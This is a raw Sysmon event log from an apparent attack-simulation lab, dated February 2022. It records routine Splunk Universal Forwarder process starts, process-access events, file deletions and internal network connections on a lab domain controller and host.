10:58:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.961{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.961{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-134B-6216-6506-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.960{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-134B-6216-6506-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.958{C8EA50B7-134B-6216-6506-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.862{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48354375D8F571603D32E9D469E3CB48,SHA256=445A01FA820C486DA3463E0ADF7F70979BF019262D810096A2924701EA9BA982,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:17.563{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51429-false10.0.1.12-8000- 23542300x8000000000000000217971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:19.521{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CF9B7F708C154D2B1E44F3887515DE7,SHA256=388443931EBFDDB385AE93971EBFBBBF7B73124474136AC1EE37A68C87E90F5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.625{C8EA50B7-134B-6216-6406-000000003802}63606408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000293451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:17.552{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53803-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-134B-6216-6406-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-134B-6216-6406-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.341{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-134B-6216-6406-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.343{C8EA50B7-134B-6216-6406-000000003802}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.962{C8EA50B7-134C-6216-6606-000000003802}5165912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.878{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37FF06B4A461CD3EDE09F4B6914A30BC,SHA256=7AC14AD1B99D53155A30A307C24E264FF9FD763612C2410AF3D524DC61ECF9F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:20.537{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA635D68F82D587E69F32B33B1AFB186,SHA256=8D72E7238792BA3E86D23635EF929E0FBEFBA062EE1C518B0A48F5556348EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.656{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-134C-6216-6606-000000003802}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-134C-6216-6606-000000003802}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.640{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-134C-6216-6606-000000003802}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.641{C8EA50B7-134C-6216-6606-000000003802}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000293462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:20.257{C8EA50B7-134B-6216-6506-000000003802}41726444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFE3783544462E89F1EB1F03BB6F9CB,SHA256=6CD7EFDF6B4DF1245C4031C785630E9ADF0934B41A00A5A69CF61F206BBE72BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:21.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A62801C9F30F1D70EBDA740417E66B69,SHA256=0DAFDA94D14F63D8A08002EA33352E21E6D5DF11F5D4191A2FC8BCE9401AE0DB,IMPHASH=00000000000000000000000000000000falsetrue 